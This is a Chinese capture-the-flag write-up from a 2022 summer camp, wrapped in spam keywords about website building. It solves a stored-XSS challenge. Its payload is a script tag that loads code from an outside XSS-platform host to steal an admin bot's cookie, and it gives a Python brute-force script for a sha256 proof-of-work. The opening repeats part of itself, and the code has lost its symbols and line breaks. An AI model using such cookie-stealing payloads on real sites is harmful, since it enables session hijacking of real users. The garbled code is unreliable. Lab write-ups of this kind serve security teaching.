专业长沙做网站公司,网页模板的使用方法,建设银行行号网站查询是什么意思,瓯北网站制作知识
例子
。2022 CNSS夏令营
To_be_Admin_Again_and_Again XSS攻击. 与admin有关, 可以尝试http://1.117.6.207:65005/admin, 显示Get out, HACKER! Only admin can see the flag!, 说明需要一个admin的验证, 这里想到获取admin的cookie.
每条留言会自动查看, 可以使用XS…知识
例子
。2022 CNSS夏令营
To_be_Admin_Again_and_Again XSS攻击. 与admin有关, 可以尝试http://1.117.6.207:65005/admin, 显示Get out, HACKER! Only admin can see the flag!, 说明需要一个admin的验证, 这里想到获取admin的cookie.
每条留言会自动查看, 可以使用XSS攻击, 很容易看出来Name和Email两栏有XSS漏洞, 可以使用封闭input标签并插入一个script标签进行Cookie的获取. 这里我直接使用了一个XSS平台进行了payload构建, 可以自己搭服务器.
payload: sCRiPt sRC//uj.ci/Qpae/sCrIpT
使用preview可以发现payload已被正常解析成了html语句, 后台也收到了cookie:
然后只需要暴力碰撞一下这个sha256即可发送至后台获取Admin的cookie.
碰撞代码的python源码:
import hashlibdef sha256(s):return hashlib.sha256(s.encode(utf-8)).hexdigest()if __name__ __main__:def sha256Crack(token):for i in range(10000000000):# print(sha256(i))a sha256(f{i:04d})[:6] print(f\r{a}, end, flushTrue)if a token[:6]:print()return iprint()return Noneprint(sha256Crack(str(input())))拿到cookie就可以改cookie去/admin了, 直接打开就有flag辽
